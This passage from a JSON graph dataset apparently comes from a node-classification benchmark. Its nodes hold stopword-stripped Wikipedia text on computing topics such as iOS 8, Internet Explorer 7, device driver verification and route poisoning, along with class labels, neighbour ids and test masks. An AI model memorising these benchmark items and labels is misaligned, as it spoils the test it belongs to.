      11157,
      10142,
      10916,
      3238,
      7983,
      823,
      3386,
      4682,
      3923,
      2903,
      1501,
      6502,
      5612,
      7151,
      9714,
      3194,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 6021,
    "label": 2,
    "text": "Device_driver_synthesis_and_verification:device driver synthesis verification device drivers programs allow software higher-level computer programs interact hardware device software components act link devices operating systems communicating systems executing commands provide abstraction layer software also mediate communication operating system kernel devices usually operating systems comes support common device drivers usually hardware vendors provide device driver hardware devices platforms aggressive scaling hardware devices complex software components made device driver development process cumbersome complex size functionality drivers started increasing device drivers became key factor defining reliability system created incentive towards automatic synthesis verification device drivers article sheds light approaches synthesis verification device drivers device drivers principal failing component systems berkeley open infrastructure network computing boinc project found os crashes predominantly caused poorly written device driver code windows xp drivers account 85 reported failures linux kernel 2.4.1 device driver code accounts 70 code size driver fault crash whole system running kernel mode findings resulted various methodologies techniques verification device drivers alternative develop techniques synthesize device drivers robustly less human interaction development process proper specification device operating systems lead reliable drivers motivation driver synthesis large number flavors operating systems device combinations set input/output control specifications makes support hardware devices operating systems difficult ability use device operating system requires availability corresponding device driver combination hardware vendors usually supply drivers windows linux mac os due high development porting costs technical support difficulties unable provide drivers platforms automated synthesis technique help vendors providing drivers support devices operating system two challenges limit testing device drivers wave verification device drivers initiated microsoft slam project early year 2000 motivation project 500,000 crashes reported day found caused one video driver leading concern great vulnerability using complex device drivers details found speech delivered bill gates large number static runtime techniques since proposed bug detection isolation static analysis means analyzing program check whether complies safety-critical properties specified example system software conform rules check user permissions writing kernel data structures n't reference null pointer without check prohibit overflowing buffer size etc checks made without actually executing code checked using traditional testing process dynamic execution requires writing many test cases exercise paths drive system error states process take long time effort practical solution another theoretically possible approach manual inspection impractical modern systems millions lines code involved making logic complex analyzed humans rules straightforward mapping source code checked using compiler rule violations found checking source operation make sense example rules like enabling interrupt disabled checked looking order function calls source code type system specify rules semantics compilers catch errors kind many type-safe languages allow memory safety violations resulting unsafe type casting detected compiler another approach use meta-level compilation mc metacompilers constructed purpose may extend compilers lightweight system specific checkers optimizers extensions need written system implementers high level language dynamically linked compilers strict static analysis software model checking algorithmic analysis programs prove properties executions automates reasoning program behavior respect given correct specifications model checking symbolic execution used verify safety-critical properties device drivers input model checker program temporal safety properties output proof program correct demonstration exists violation specification means counterexample form specific execution path tool sdv static driver verifier microsoft uses static analysis windows device drivers back end analysis engine slam used model checking symbolic execution compile time static verification rules observed drivers api specified c like language slic specification language interface checking analysis engine finds paths lead violations api usage rules presented source level error paths driver source code internally abstracts c code boolean program set predicates rules observed program uses symbolic model checking validate predicates boolean program model checker blast berkeley lazy abstraction software verification tool used find memory safety incorrect locking errors linux kernel code uses abstraction algorithm called lazy abstraction build model driver c code successful verifying temporal safety properties c programs 50k lines code also used determine change source code affects proof property previous version demonstrated windows device driver avinux another tool facilitates automatic analysis linux device drives built top bounded model checker cbmc exist fault localization methods find bug location model checking tools return long counter example trace hard find exact faulty location dynamic program analysis performed running program sufficient test inputs produce interesting behaviors safe drive low overhead system detecting recovering type safety violations device drivers 4 changes source code linux network drivers able implement safedrive give better protection recovery linux kernel similar project using hardware isolate device drivers main kernel nook place device drivers separate hardware protection domain called nooks separate permission setting pages making sure driver modify pages domain read kernel data since share address space another similar work area automatic recovery operating systems due driver faults minix 3 operating system isolate major faults defects detected failing components replaced fly alternative verification isolation faults deploy techniques device driver development process make robust given device specification operating system functions one method synthesize device driver device helps reduce human introduced errors well cost time involved developing system software synthesis methods rely form specification hardware device manufacturers operating system functions hardware operating code usually low level prone errors code development engineer rely hardware documentation typically contains imprecise inaccurate information several interface definition languages idl express hardware functionalities modern oses uses idls glue components hide heterogeneity like remote procedural call idl applies hardware functionalities well section discuss writing device drivers domain specific languages helps abstract low level coding use specific compilers generate code devil allows high level definition communication device hardware components expressed i/o ports memory-mapped registers specifications converted set c macros called driver code thus eliminates error induced programmer writing low level functions ndl enhancement devil describing driver terms operational interface uses devil interface definition syntax includes set register definitions protocols accessing registers collection device functions device functions translated series operations interface device driver generation one first write driver functionalities interface specification languages use compiler generate low level driver code hail hardware access interface language another domain-specific device driver specification language driver developer needs write following hail compiler takes inputs translates specification c code hardware software co-design designer specifies structure behavior system using finite state machines communicate among series testing simulation formal verification done state machines deciding components go hardware software hardware usually done field programmable gate arrays fpgas application specific integrated circuits asics whereas software part translated low-level programming language approach mostly applies embedded systems defined collection programmable parts interact continuously environment sensors existing techniques intended generating simple micro-controllers drivers standalone synthesis device system software done separately device modeled using hardware description language hdl software developer access hdl specifications hardware developers put forth device interface data sheet device data sheet driver developer extracts register memory layout device behavioral model form finite state machines expressed domain specific languages described interface language section final step involves generating code specifications tool termite takes three specifications generate driver given specifications termite generate driver implementation translates valid sequence os request sequence device commands due formal specification interfaces termite generate driver code holds safety liveness properties another interesting hacking effort done revnic generates driver state machine reverse engineering existing driver create inter-portable safe drivers new platforms reverse engineer driver wiretaps hardware i/o operations executing driver using symbolic concrete executions output wiretap fed synthesizer reconstructs control flow graph original driver multiple traces along boilerplate template corresponding device class using methods researchers ported windows drivers network interfaces linux embedded operating systems many static analysis tools widely used many driver synthesis verification tools seen widespread acceptance practice one reasons drivers tend support multiple devices driver synthesis work usually generates one driver per device supported potentially lead large number drivers another reason drivers also processing state machine model drivers depict processing various verification synthesis techniques surveyed article advantages disadvantages example runtime fault isolation performance overhead whereas static analysis cover classes errors complete automation device driver synthesis still early stages promising future research direction progress facilitated many languages available today interface specification eventually consolidate single format supported universally device vendors operating systems teams payoff standardization effort could realization completely automated synthesis reliable device drivers future",
    "neighbors": [
      6403,
      5415,
      7983,
      823,
      4572
    ],
    "mask": "None"
  },
  {
    "node_id": 6022,
    "label": 6,
    "text": "StuffIt_Expander:stuffit expander stuffit expander proprietary freeware closed source decompression software utility developed allume systems subsidiary smith micro software formerly known aladdin systems runs classic mac os macos microsoft windows prior 2011 linux version also available download latest version mac platform follows stuffit target criticism dissatisfaction mac users past file format changes frequently notably introduction stuffit version 5.0 expander 5.0 contained many bugs file format readable earlier version 4.5 leaving mac users time without viable compression utility latest stand-alone version windows 2009 13.0 unlike version 12.0 able decompress newer .sitx zip archives version 2009 claims able decompress 30 formats listed executables require .net v2.0 framework msvc 2008 9.0 runtimes previous stand-alone version able decompress .sit classic mac os-specific archives 7.02 distributed stuffit v7.0.x windows versions 7.5.x 11 expander capabilities actually performed stuffit standard edition allowed decompression even end trial period start stuffit expander mode following command line switches used -expand -uiexpander note registration reminder dialogue box shown case older versions stuffit expander classic mac os platform stuffit expander 3.5 possible enhance capabilities stuffit expander add support decompressing additional archive formats means shareware dropstuff expander enhancer software aladdin systems also command line dos application called unstuff v1.1 allows decompression .sit files stuffit expander 2009 decompresses files following formats",
    "neighbors": [
      10121,
      1420,
      6797,
      1940,
      3222,
      9880,
      11171,
      3114,
      3371,
      10027,
      3629,
      7983,
      823,
      6713,
      576,
      2755,
      11076,
      1352,
      4296,
      10317,
      10575,
      4561,
      722,
      2389,
      11614,
      1631,
      3296,
      9953,
      5858,
      6759,
      6377,
      7529,
      4459,
      237,
      1646,
      7667,
      3573,
      6389,
      4089,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 6023,
    "label": 2,
    "text": "IOS_8:ios 8 ios 8 eighth major release ios mobile operating system developed apple inc. successor ios 7 announced company worldwide developers conference june 2 2014 released september 17 2014 succeeded ios 9 september 16 2015. ios 8 incorporated significant changes operating system introduced continuity cross-platform mac iphone ipad system enables communication devices different product categories ability answer calls reply sms mac ipad continuity includes handoff feature lets users start task one device continue another changes included new spotlight suggestions search results feature provides detailed results family sharing family link together accounts share content one parent administrator permission controls updated keyboard quicktype providing contextual predictive word suggestions extensibility allows easier sharing content apps third-party developers got additional features integrate apps deeper operating system including support widgets notification center ability make keyboards users replace default ios keyboard app updates release included new health app aggregate data different fitness apps well enabling medical id accessible lock screen emergencies support icloud photo library photos app enables photos synchronized stored cloud icloud drive lets users store files cloud browse across devices ios 8.4 apple updated music app streaming service called apple music 24-hour radio station called beats 1 reception ios 8 positive critics praised continuity extensibility major features enabling easier control interaction different apps devices also liked quicktype keyboard word suggestions highlighted spotlight suggestions making iphone almost portable search portal everything however reviewers noted full potential ios 8 would realized third-party developers integrated apps support new features particularly widgets notification center roughly week release ios 8 reached 46 ios usage share october 2014 reported adoption rate stalled increasing single percentage point previous month situation blamed requirement high amount free storage space install upgrade especially difficult iphones sold 8 16 gigabytes maximum storage space following december ios 8 reached 63 usage share notable 16 increase october measurement ios 8 introduced company worldwide developers conference june 2 2014 first beta made available conference attendees keynote presentation ios 8 officially released september 17 2014. ios 8.0.1 released september 24 2014 first update ios 8 update meant bring various bug fixes however update withdrawn due issue disabled touch id cellular network connectivity models apple instead recommended affected users reinstall initial ios 8 release wait version 8.0.2 ready ios 8.0.2 released september 25 2014 day release ios 8.0.1 included fixes bugs present previous update ios 8.1 released october 20 2014 update introduced apple pay iphone 6 6 plus united states added icloud photo library beta status returned camera roll photos added continuity features enable iphone users read send sms mms ipad mac also introduced instant hotspot allowing mac users remotely activate personal hotspot feature nearby iphone ios 8.1.1 released november 17 2014 bug fixes performance improvements iphone 4s ipad 2. ios 8.1.2 released december 9 2014 fix issue ringtones purchased itunes store would removed ios device ios 8.1.3 released january 27 2015 update included bug fixes reduced amount storage space required perform ios update ios 8.2 released march 9 2015 update included support apple watch apple watch app iphone providing app store configuration options access health options units measurement well lots stability improvements bug fixes release ios 8.3 apple announced public beta testing program allowing consumers receive test upcoming versions ios software official general release ios 8.3 released april 8 2015 update included emoji improvements updated emoji keyboard picker organizes emoji categories new diversified emoji skin tone modifiers new languages siri support wireless carplay well major bug fixes improvements ios 8.4 released june 30 2015 update introduced apple music therefore overhauled existing music app apple music service ios 8.4 also relocated audiobooks music app ibooks app ios 8.4.1 released august 13 2015 various fixes apple music ios 8 introduced continuity cross-platform mac iphone ipad system enables communication devices different product categories continuity enables phone call functionality ipad mac calls routed iphone secondary device secondary device serves speaker phone also brings sms support ipad mac extension imessage feature previous versions continuity adds feature called handoff lets users start task one device continue another composing e-mail iphone continuing ipad sending mac order support handoff continuity macs needed os x yosemite operating system released october 2014 well support bluetooth low energy ios 8 introduced spotlight suggestions new search feature integrates many websites services show detailed search results including snippets wikipedia articles local news quick access apps installed device itunes content movie showtimes nearby places info various websites spotlight suggestions available ios home screen well safari web browser search bar drop-down notification center redesigned allow widget functionality third-party apps add widget support apps let users see information notification center without open respective app users add rearrange remove widgets time examples widgets include weather app showing current weather calendar app showing upcoming events notifications actionable allowing users reply message appears quick drop-down act notification notification center ios 8 includes new predictive typing feature called quicktype displays word predictions keyboard user types apple allows third-party developers make keyboard apps users replace default ios keyboard added privacy apple added settings toggle called allow full access optionally enables keyboard act outside app sandbox synchronizing keyboard data cloud third-party keyboards allowed use siri voice dictation secure text fields allow input ios 8 introduced family sharing allows 6 people register unique itunes accounts linked together one parent becoming administrator controlling overall experience purchases made one account shared family members purchases made kids 13 years age require parental approval purchases made adults visible kids family sharing also extends apps shared album automatically generated photos app family member allowing everyone add photos videos comments shared place ask buy feature allows anyone request purchase items app store itunes store ibooks store well in-app purchases icloud storage administrator option either approve deny purchase multitasking screen shows list recently called favorited contacts feature turned settings ios 8 includes additional data roaming option settings european users allowing greater control data usage abroad siri personal voice assistant integrated shazam support asking siri song identify song playing wi-fi calling added allow mobile phone calls wi-fi mobile operator carriers enable voice-over-wi-fi functionality services camera app gets two new features time-lapse self-timer time-lapse records frames shorter intervals normal film frequencies builds movies showing events faster speed self-timer gives user option three-second ten-second countdown automatically taking photo ipads take pictures panoramic mode ios 8 added icloud photo library support photos app enabling photo synchronization different apple devices photos videos backed full resolution original formats feature almost meant lower-quality versions photos could cached device rather full-size images potentially saving significant storage space models limited storage availability photos app received better search different search categorization options including nearby one year ago favorites home based geolocation date photo capture additionally photos app gained precise editing controls including improved rotation one-touch auto-enhancement tools deeper color adjustments brightness contrast exposure shadows also option hide photo without deleting apple added extensibility feature ios 8 allows filters effects third-party apps accessed directly within menu standard photos app rather import export photos respective app apply effects initial release ios 8 apple removed camera roll feature photos app camera roll overview photos device replaced recently added photo view displaying photos recently user captured despite replaced recently added album removal camera roll sparked user complaints apple returned feature ios 8.1 update ios 8 messages gets new features group conversations including disturb mode disables conversation notifications well ability remove participants chat new tap talk chat button lets users send quick voice comments recipient record button allows users record short videos interaction two apple users messages app allows users send short picture video audio clips 2-minute expiration time settings app user option messages automatically deleted certain time period safari web browser developers add support safari password sharing allows share credentials sites apps potentially cutting number times users need type credentials apps services browser also adds support webgl graphics api similar style file manager icloud drive file hosting service enabled settings lets users save kind file app media synchronized ios devices well mac ios 8 apple updated app store explore tab providing improved app discovery trending searches search tab ability developers bundle multiple apps single discounted package new preview videos allow developers visually show app function healthkit service allows developers make apps integrate new health app health app primarily aggregates data fitness apps installed user device except steps flights climbed tracked motion processor user iphone users enter medical history medical id accessible lock screen case emergency homekit serves software framework lets users set iphone configure communicate control smart-home appliances designing rooms items actions homekit service users enable automatic actions house simple voice dictation siri apps manufacturers homekit-enabled devices required purchase license homekit products required encryption co-processor equipment manufactured without homekit-support enabled use gateway product hub connects devices homekit service passbook app ios 8 updated include apple pay digital payment service available iphone 6 6 plus release ios 8.1 new music streaming service apple music introduced ios 8.4 update allows subscribers listen unlimited number songs on-demand subscriptions release music service standard music app ios revamped visually functionally include apple music well 24-hour live radio station beats 1 notes received rich text editing support ability bold italicize underline text image support allowing users post photos app weather app uses weather data weather channel instead yahoo app also received slight changes user interface ios 8 added new tips app shows tips brief information features ios weekly basis ios 8 allows touch id used third-party apps ios 8 received positive reviews brad molen engadget highlighted continuity major advancement users multiple apple devices also praised extensibility feature allowing apps share data liked support third-party keyboards however molen noted new introductions family sharing continuity icloud drive require diving apple ecosystem work particularly enjoyed actionable notifications third-party widget support notification center charles arthur guardian also liked extensibility well new quicktype word suggestions functionality ios keyboard criticized lack option choosing default apps also criticized settings menu confusing unintuitive darrell etherington techcrunch praised improvements imessage writing best ability mute leave group conversations something ’ sorely missing since introduction group imessage conversations liked new search editing features photos quicktype feature keyboard particularly highlighted spotlight suggestions one better features ios 8 even ’ small service addition noting makes iphone almost portable search portal everything martin bryant next web wrote real advances yet come adding apple included demonstrations done true power ’ hood realized coming days weeks months third-party developers gradually incorporate new features apps september 23 2014 roughly week release ios 8 user adoption ios 8 reached 46 october 2014 andrew cunningham ars technica reported ios 8 user adoption rate stalled climbing single percentage point since previous september measurement 46 cunningham blamed over-the-air update requiring 5 gigabytes install unusually large amount may posed challenges using 8 gigabyte 16 gigabyte devices alternative apple offered update via itunes software cunningham noted itunes hookup going even way days years ago least apple spent last three years coaching people use idevices independently computers december new report ars technica stated ios 8 usage increased 63 solid 16 percent study apteligent formerly crittercism found rate apps crashed tests 3.56 ios 8 higher 2 found ios 7.1 september 2014 ios 8.0.1 update caused significant issues touch id iphone 6 cellular network connectivity models apple stated affected users reinstall initial ios 8 release version 8.0.2 ready ios 8.0.2 released one day 8.0.1 fix issues caused 8.0.1 update forbes published several articles focusing problems ios 8 regarding wi-fi battery bluetooth calendar may 2015 news outlets reported bug receiving text message specific combination symbols arabic characters caused messages application crash iphone reboot bug named effective power could potentially continuously reboot device message visible lock screen flaw exploited purpose trolling intentionally causing others phones crash bug fixed ios 8.4 update released june 2015 september 2014 hoax apple advertisement alleged feature called wave ios 8 circulated twitter promised users would able recharge iphone heating microwave oven feature exist media cited numerous people reporting twitter destroyed iphone following procedure described advertisement release apple dropped support iphone 4",
    "neighbors": [
      10755,
      9732,
      1549,
      4111,
      5647,
      7697,
      3602,
      6675,
      11289,
      7199,
      8735,
      8736,
      6186,
      4139,
      6700,
      1074,
      8754,
      7736,
      9784,
      8253,
      8767,
      576,
      5696,
      8774,
      8783,
      4180,
      10838,
      1623,
      3672,
      9308,
      3167,
      3681,
      9826,
      8806,
      3691,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      5784,
      1177,
      4251,
      3228,
      2207,
      10406,
      11430,
      3241,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      1729,
      3790,
      7378,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      6377,
      2282,
      9451,
      1772,
      4844,
      10478,
      5363,
      7928,
      8441,
      11513,
      7420,
      8446,
      9987,
      1290,
      3338,
      9999,
      784,
      10512,
      4888,
      5912,
      2339,
      10023,
      4399,
      11569,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      10052,
      838,
      7496,
      8014,
      857,
      4957,
      6495,
      9063,
      10602,
      3948,
      4972,
      10608,
      2439,
      6539,
      7052,
      7057,
      3483,
      2979,
      9123,
      11171,
      7595,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      7154,
      5619,
      11257,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 6024,
    "label": 4,
    "text": "Screening_router:screening router screening router performs packet-filtering used firewall cases screening router may used perimeter protection internal network entire firewall solution",
    "neighbors": [
      8998,
      3941,
      6262,
      4895
    ],
    "mask": "None"
  },
  {
    "node_id": 6025,
    "label": 3,
    "text": "MOVDDUP:movddup x86 assembly programming language movddup name specific action performable modern x86 processors 3rd-generation streaming simd extensions sse3 action involves copying number temporary space processor use computations specifically movddup causes one double-precision floating-point source copied lower half upper half xmm register source operand either xmm register xmm2 memory address m64 source operand xmm register lower half register used operation source operand memory address assumed address 8-byte region value used operation destination operand must xmm register xmm1 x86 instruction listings",
    "neighbors": [
      10689,
      6596,
      977,
      499,
      8853,
      1915,
      8126
    ],
    "mask": "Test"
  },
  {
    "node_id": 6026,
    "label": 5,
    "text": "Route_poisoning:route poisoning route poisoning method prevent router sending packets route become invalid within computer networks distance-vector routing protocols computer networks use route poisoning indicate routers route longer reachable considered routing tables unlike split horizon poison reverse route poisoning provides sending updates unreachable hop counts immediately nodes network protocol detects invalid route routers network informed bad route infinite ∞ route metric makes nodes invalid route seem infinitely distant preventing routers sending packets invalid route distance-vector routing protocols rip use maximum hop count determine many routers traffic must go reach destination route hop count number assigned incremented routing information passed router router route considered unreachable hop count exceeds maximum allowed route poisoning method quickly forgetting outdated routing information router routing tables changing hop count unreachable higher maximum number hops allowed sending routing update case rip maximum hop count 15 perform route poisoning route hop count changed 16 deeming unreachable routing update sent updates lost nodes network would informed route invalid could attempt send packets bad route cause problem known routing loop therefore route poisoning used conjunction holddowns keep update messages falsely reinstating validity bad route prevents routing loops improving overall efficiency network",
    "neighbors": [
      3752,
      3095
    ],
    "mask": "Test"
  },
  {
    "node_id": 6027,
    "label": 1,
    "text": "Amazon_SimpleDB:amazon simpledb amazon simpledb distributed database written erlang amazon.com used web service concert amazon elastic compute cloud ec2 amazon s3 part amazon web services announced december 13 2007 ec2 s3 amazon charges fees simpledb storage transfer throughput internet december 1 2008 amazon introduced new pricing free tier 1 gb data 25 machine hours transfer amazon web services free charge simpledb provides eventual consistency weaker form consistency compared database management systems often considered limitation harder reason makes harder write correct programs make use simpledb limitation result fundamental design trade-off foregoing consistency system able achieve two highly desirable properties component failures assumed inevitable thus properties deemed necessary order provide reliable web service cap theorem states possible system exhibit properties along consistency thus designers needed settle weaker form consistency published limitations conditional put conditional delete new operations added february 2010 address problem arises accessing simpledb concurrently consider simple program uses simpledb store counter i.e number incremented program must three things program runs programs access simpledb work correctly however often desirable software applications particularly web applications access data concurrently data accessed concurrently race condition arises would result undetectable data loss continuing previous example consider two processes b running program suppose simpledb services requests data described step 1 b b see value let say current value counter 0 steps 2 3 try store 1 b try thus final counter value 1 even though expected final counter value 2 system attempted two increment operations one another b problem solved use conditional put suppose change step 3 follows instead unconditionally storing new value program asks simpledb store new value value currently holds value retrieved step 1 sure counter value actually increases introduces additional complexity simpledb able store new value current value expected program must repeat steps 1-3 conditional put operation actually changes stored value consistent read new feature released time conditional put conditional delete name suggests consistent read addresses problems arise due simpledb eventual consistency model see limitations section consider following sequence operations simpledb eventual consistency guarantee allow us say data retrieved step 2 reflects updates made step 1 eventual consistency guarantees step 2 reflects complete set updates step 1 none updates consistent read used ensure data retrieved step 2 reflect changes step 1 reason inconsistent results arise consistent read operation used simpledb stores data multiple locations availability new data step 1 might written locations simpledb receives data request step 2 case possible data request step 2 serviced one locations new data written amazon discourages use consistent read unless required correctness reason recommendation rate consistent read operations serviced lower regular reads talk simpledb superseded dynamodb longer iterated though amazon plan remove dynamodb appears successor",
    "neighbors": [
      8962,
      8451,
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      5139,
      2965,
      2328,
      4377,
      8986,
      5660,
      11038,
      6307,
      7076,
      10020,
      9766,
      5159,
      6184,
      2217,
      11556,
      6444,
      8495,
      3121,
      7352,
      10681,
      2496,
      4289,
      11201,
      1224,
      5960,
      8520,
      10185,
      4429,
      590,
      7248,
      1362,
      467,
      9682,
      7512,
      8921,
      735,
      6367,
      4194,
      11646,
      5732,
      9828,
      1001,
      10090,
      3819,
      7660,
      8181,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 6028,
    "label": 2,
    "text": "Internet_Explorer_7:internet explorer 7 windows internet explorer 7 ie7 codenamed rincon web browser windows released microsoft october 2006 internet explorer 7 part long line versions internet explorer first major update browser 5 years default browser windows vista windows server 2008 replace internet explorer 6 windows xp windows server 2003 unlike version 6 version support windows nt 4.0 windows 98 windows 98 se windows 2000 windows portions underlying architecture including rendering engine security framework improved new features include tabbed browsing page zooming integrated search box feed reader better internationalization improved support web standards although pass acid2 acid3 tests security enhancements include phishing filter stronger encryption windows vista 256-bit 128-bit xp delete browsing history button easily clear private data also first version internet explorer branded marketed name 'windows instead 'microsoft ie7 shipped default browser windows vista windows server 2008 offered replacement internet explorer 6 windows server 2003 windows xp ie7 superseded internet explorer 8 march 2009 2001 microsoft released internet explorer 6 update windows 98 second edition windows windows nt 4.0 service packs 6 windows 2000 included default windows xp release ie6 service pack 1 2003 microsoft announced future upgrades internet explorer would come future upgrades windows stating improvements ie require enhancements underlying os february 15 2005 rsa conference san francisco microsoft chairman bill gates announced microsoft planning new version internet explorer would run windows xp dean hachamovitch general manager internet explorer team cited needed security improvements primary reason new version first beta ie7 released july 27 2005 technical testing first public preview version internet explorer 7 beta 2 preview pre-beta 2 version released january 31 2006 final public version released october 18 2006 day yahoo provided post-beta version internet explorer 7 bundled yahoo toolbar yahoo -specific customizations late 2007 microsoft announced ie7 would included part windows xp sp3 internet explorer 6 7 receiving updates pc manufacturers however pre-installed internet explorer 7 well 8 new xp pc especially netbooks october 8 2007 microsoft removed windows genuine advantage component ie7 allowing downloaded installed without genuine copy windows within year ie7 release end 2006 end 2007 support calls microsoft decreased 10-20 december 16 2008 security flaw found internet explorer 7 exploited crackers steal users passwords following day patch issued fix flaw estimated affected around 10,000 websites estimates ie7 global market share 1.5-5 version internet explorer renamed microsoft internet explorer windows internet explorer part microsoft rebranding components included windows internet explorer 7 introduces windows rss platform tightly integrated subscribe rss atom feeds synchronize update schedule display built-in style sheet version 7 intended defend users phishing well deceptive malicious software also features full user control activex better security framework including integrated much windows previous versions thereby increasing security unlike previous versions internet explorer activex control hosted windows explorer process rather runs process also includes bug fixes enhancements support web standards tabbed browsing tab preview management multiple-engine search box web feeds reader internationalized domain name support idn antiphishing filter october 5 2007 microsoft removed 'genuine software validation install means versions windows whether able pass validation able install browser integrated search box supports opensearch windows vista internet explorer operates special protected mode runs browser security sandbox write access rest operating system file system running protected mode ie7 low integrity process gain write access files registry keys outside low-integrity portions user profile feature aims mitigate problems whereby newly discovered flaws browser add-ons hosted inside allowed crackers subversively install software user computer typically spyware microsoft addressed security issues two distinct ways within windows vista user account control forces user confirm action could affect stability security system even logged administrator protected-mode ie runs web browser process much lower permissions user first vulnerability exclusive internet explorer 7 posted 6 days january 12 2016 new microsoft lifecycle support policy internet explorer went effect wepos became remaining supported os ie7 support continued wepos reached eol april 12 2016 making april 2016 security update last ever public update ie7 users criticised phishing filter easy circumvent one successful method bypassing internet explorer phishing filter reported redirecting blacklisted web page another non-blacklisted page using server-side redirect new page blocked well attack remain active flaw means phishers keep links previous emails functioning simply moving new server original web page blacklisted adding redirect criticised doubly serious presence phishing filter may lull users false sense security filter bypassed phishing filter went developed renamed safety filter smartscreen microsoft development internet explorer 8 internet explorer 7 adds support per-pixel alpha transparency png well minor improvements html css dom support microsoft stated goal version 7 fix significant bugs areas caused trouble developers however full compatibility standards postponed internet explorer 7 additionally features update wininet api new version better support ipv6 handles hexadecimal literals ipv6 address also includes better support gzip deflate compression communication web server compressed thus require less data transferred internet explorer protected mode support wininet exclusive windows vista although internet explorer 7 compliant previous versions according figures remains least standards-compliant compared major browsers period pass acid2 acid3 tests two test cases designed web standards project verify css compliance 2008 msnbc article tim berners-lee said lack support internet explorer responsible holding back widespread adoption webmasters several new open technology standards specifically scalable vector graphics svg supported elsewhere since 2001 available internet explorer using 3rd party plugin release internet explorer 9 ie7 requires least",
    "neighbors": [
      6657,
      517,
      9736,
      537,
      6171,
      9757,
      8735,
      7713,
      10791,
      10282,
      3629,
      2611,
      4661,
      3639,
      10808,
      3643,
      9275,
      3137,
      1098,
      10828,
      9808,
      6231,
      1113,
      8281,
      2139,
      603,
      5225,
      9328,
      4722,
      119,
      10872,
      8315,
      637,
      1664,
      5765,
      134,
      653,
      5784,
      10910,
      3250,
      9394,
      9908,
      185,
      2244,
      7364,
      7885,
      3283,
      4310,
      2777,
      735,
      4326,
      4331,
      4844,
      8939,
      8443,
      9983,
      5380,
      7943,
      1802,
      1807,
      790,
      3350,
      6431,
      11559,
      1834,
      10026,
      7983,
      11060,
      10057,
      5470,
      11112,
      8557,
      8576,
      3971,
      8584,
      9609,
      11683,
      3496,
      5054,
      5057,
      9167,
      4561,
      5078,
      11223,
      5082,
      7134,
      10722,
      8169,
      4074,
      2027,
      494,
      6133,
      5622
    ],
    "mask": "None"
  },
  {
    "node_id": 6029,
    "label": 3,
    "text": "MLX_(software):mlx software mlx series machine language entry utilities published magazines compute compute gazette well books compute publications programs designed allow relatively easy entry type-in machine language listings often included publications versions available commodore 64 pet vic-20 atari 8-bit family apple ii mlx introduced december 1983 issue compute versions commodore 64 atari 8-bit family followed january 1984 issue compute gazette version vic-20 8k expansion march 1984 issue tiny mlx version unexpanded vic-20 versions mlx shared format consisting six data bytes decimal format plus seventh byte served checksum although line began memory address bytes separated commas typed program auto-incremented address automatically printed comma delimiters every three characters invalid keystrokes filtered line completely typed automatically verified checksum value matched user would prompted next line warning buzzer would sound invalid input would discarded user could retype line commodore version beginning may 1984 issue compute several keyboard keys redefined create makeshift numeric keypad mlx listings reserved relatively long machine language programs speedscript shorter programs often printed form basic loaders used codice_1 statements codice_2 code memory although original mlx efficient entry method basic loaders codice_1 statements number issues foremost among codice_2d data entered directly affected area memory since many machine language programs located partially entirely basic ram area meant user manually adjust pointers top bottom basic ram using codice_2 statements provided article running mlx keep entry program encroaching code vice versa program entered multiple sittings done time also decimal storage required seven keystrokes two bytes entered taking account checksums furthermore many transposition errors overlooked original mlx unsophisticated checksum algorithm new version mlx introduced apple ii june 1985 issue version used 8-byte-per-line hexadecimal format sophisticated hash algorithm implemented catch errors overlooked original failing notice substitution 0xff 0x00 improved layout hashing backported commodore 64 version also added editor buffer located single location memory removing need codice_2 memory locations startup new version known title screen mlx ii otherwise simply new mlx first appeared december 1985 issue compute appeared compute gazette following month replacement version mlx continued used compute gazette switched disk-only format december 1993",
    "neighbors": [
      7421
    ],
    "mask": "Test"
  },
  {
    "node_id": 6030,
    "label": 3,
    "text": "Phantasie_(video_game):phantasie video game phantasie first video game phantasie series based isle gelnor phantasie allows group six characters adventure countryside try defeat evil black knights sorcerer leader nikademus players could choose one six character classes thief fighter ranger monk priest wizard could also choose races human dwarf halfling elf gnome selecting random one could also choose ogre troll pixie gnoll orc lizard man minotaur races game notable taking advantage broad mix styles game town window allowed purchasing various shops top-down style dungeon crawl view top-down world map separate combat window character class unique fighting styles options characters could choose strategy particular round turn-based combat segments combat experience awarded players would return town purchase levels qualified 50,000 copies sold north america phantasie successful ssi company best-selling commodore game late 1987 game reviewers hartley pattie lesser 1987 complimented atari st version phantasie role computers column dragon 120 1987 recommending atari st owners consider phantasie game well-worth attention analog computing 1988 called phantasie sequel best fantasy role-playing games atari 8-bit 1991 1993 computer gaming world scorpia called phantasie surprisingly good little game many interesting features phantasie phantasie iii questron ii later re-released together reviewed 1994 dragon 203 sandy petersen eye monitor column petersen gave compilation 2 5 stars",
    "neighbors": [
      9006,
      6426,
      9166,
      8062
    ],
    "mask": "None"
  },
  {
    "node_id": 6031,
    "label": 4,
    "text": "The_Plot_to_Hack_America:plot hack america plot hack america putin cyberspies wikileaks tried steal 2016 election non-fiction book malcolm nance author describes russian interference 2016 united states elections published paperback audiobook e-book formats 2016 skyhorse publishing second edition also published year third edition 2017 nance researched russian intelligence working russian interpreter studying kgb history nance described black propaganda warfare known active measures rt russia today sputnik news recounts vladimir putin kgb rise details trump campaign ties russia nance concludes putin managed cyberattack hacker groups cozy bear fancy bear wall street journal placed book list best-selling books week february 19 2017 seventh place category nonfiction e-books new york journal books called essential primer anyone wanting fully informed unprecedented events surrounding 2016 u.s. presidential election napa valley register described nance work best book subject huffington post remarked putin played game thrones election newsweek wrote problem disinformation tactics time debunked public already consumed falsehoods book dedicated u.s. army officer humayun khan begins foreword spencer ackerman nance details russian interference 2016 u.s. elections describes march 2016 democratic national committee dnc servers hacked someone seeking opposition research donald trump nance learnt hacker guccifer 2.0 would release hacked dnc materials nance gives context including trump motivations run president made fun 2011 white house correspondents association dinner criticism barack obama entry 2016 race white house nance discusses black propaganda techniques used russian federation characterizes rt russia today sputnik 